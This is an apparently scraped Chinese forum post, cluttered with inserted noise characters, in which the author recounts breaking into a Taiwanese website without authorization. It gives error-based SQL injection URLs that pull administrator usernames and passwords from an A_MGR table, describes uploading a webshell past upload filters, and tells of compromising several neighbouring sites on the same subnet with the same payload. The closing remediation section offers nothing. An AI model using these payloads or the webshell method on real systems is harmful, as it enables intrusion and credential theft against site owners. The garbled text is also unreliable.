发现一个注入点) a, \& U/ P2 R8 S6 v
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
4 ?3 C; ~" g" k/ T, k/ ~( }6 ^5 z# F
4 o; E* G8 i6 q- v6 R习惯性的加’having1=1--' f' |7 O$ [' m3 `- W. g( [! v
, m/ w1 S+ e- Z8 h6 K9 Z/ s/ P. D+ ~
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—1 a! E2 x# s9 l2 R' v
" U. T2 H* C; @) R7 Q
0 g! ]8 M* ?. a' K9 }3 k
% M" o! c5 g2 w. I/ I k' A
爆出Diary_A.dl_Title(这时候很激动啊)
/ o1 {# M- x6 {" ?2 M, D: _! i# I* \# l! N1 B: n4 \/ `
那么继续
: K: } Y+ p# U, ]http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—1 S' i5 h% o0 [! d0 L! d4 G
3 m9 y4 f8 l5 }& {0 t. Z4 X继续,一直爆下去
. n, t5 [& ^# o& i# I
3 P8 F$ W1 a- e" h2 Z( a爆到几个字段和表段 但是没找到需要的管理用户的字段
4 p- N+ a+ y+ h
4 _0 c0 ?0 Q0 ]1 ~8 c蛋疼了 怎么办 然后去后台登陆页看源码
& A& j" P. ]" N D2 Q4 P9 P1 H# n% f j2 x( F6 O
0
2 R ?7 B& A" g: T' q, q8 @. P
$ p4 i/ z7 v6 U+ c0 M. yInput name= “ADUID”. o7 e% k) d" r
Input name= “ADPWD”: O/ {) a; L3 L8 w
" \# r/ \3 H2 d( S很幸运 找到了字段那就继续
& {& z$ x1 t, u! A找到之后开始爆用户4 {$ k% o/ Y1 `
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—! ^9 P7 @" a# J X5 j. f; i6 ~
爆密码0 r3 g5 @ e- {+ T6 B
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
% Q/ X2 h% `; t& b- S* ^& M测试了下 这个注入点只能爆到文章哪里的表 S/ v& X3 r1 S5 J+ r
, E3 v B" N8 s2 L: {头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
) _9 s( N5 |: \+ }9 s
7 W% G; W2 a3 o4 S# ?1 l又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
# n( R" I8 t! s; u. F5 N8 Z# k \$ j9 a$ g
473
. D- g4 w! ?& t6 S6 _: I4 E$ Q7 `9 b+ K/ x
进后台, E1 z5 `+ t) ]% Z
* z9 @) X4 k5 H' K5 R5 G6 t, q) G! q5 S' X! @# ^
发现几个上传点 有的地方不能上传 而且防止恶意代码8 r) L0 c8 K7 O2 s& z
9 ?+ E$ R' B7 U6 v# b
没办法 各种百度各种找大牛 找到一只好像可以突破的马
: M5 Q* O( w% ~" A8 G, V- c$ l5 T% T# |/ q
/ f( c/ H0 |- S9 @) @! c/ D3 x在系统管理那里直接上传 不过没有显示地址7 r S ]9 }3 ?
. o4 b6 V% Z& E7 M7 V2 z再上传一次 抓包 搞定OK( D/ m- B" a/ I/ ]9 H; r
$ T3 |- u) s1 ]2 s; [ |# ^7 Q
6 M- W4 y' s' `. O5 D7 b8 b" U- _+ w/ N" B" V% f2 p
472- y7 G+ e/ R* r2 H
g& W& G- W! H9 U" `8 A; ^7 b1 H晚上不行了 去睡觉。。。& \$ S4 w n- T: z$ \
第二天刚起床 闲的没事做继续日站吧
( N. b5 N0 [) j2 i: s# m2 X' X3 {4 e' g- e
找个站 就把这个站的旁c扫了下4 |- f* @' I* Q6 ~, m
E& ?9 W, _+ v
发现c段也有一个购物站 ,然后还和这个站的模板差不多$ q% N+ [. }, N
9 a2 s, e; ]# C8 N
就找到会员登录口测试
9 c& @3 n5 O0 O* A: V: d( L) h" R" h- |# w V
'and (select top 1 MGR_UID from A_MGR)>0—, I( i9 z# t+ e
果断爆到了 这时候我很激动 通杀
* w' ^; f; a/ h! U* L9 M. w
8 |' s. V/ I& g$ l4 _" Y, s8 ]再次翻c段8 z. o# o2 f) j) m9 K8 m* d7 x
. d# v9 r8 S. o$ G6 x翻出几个站 都成功拿下
+ n) ^) e# U5 v* t* V: x. H( f+ S- }* c& Q
+ O% V. [7 [# g9 v
- i" h3 ^- z1 f1 Y0 H6 w修复方案:
3 w: O8 a- y: \$ J' V他们比我专业
6 _7 [/ k+ ?: q4 j' n
3 W1 a' i4 }) x5 W& ?2 c
1 Z7 S- E, b3 O/ A, \. g3 I# I6 r! w( e- b
|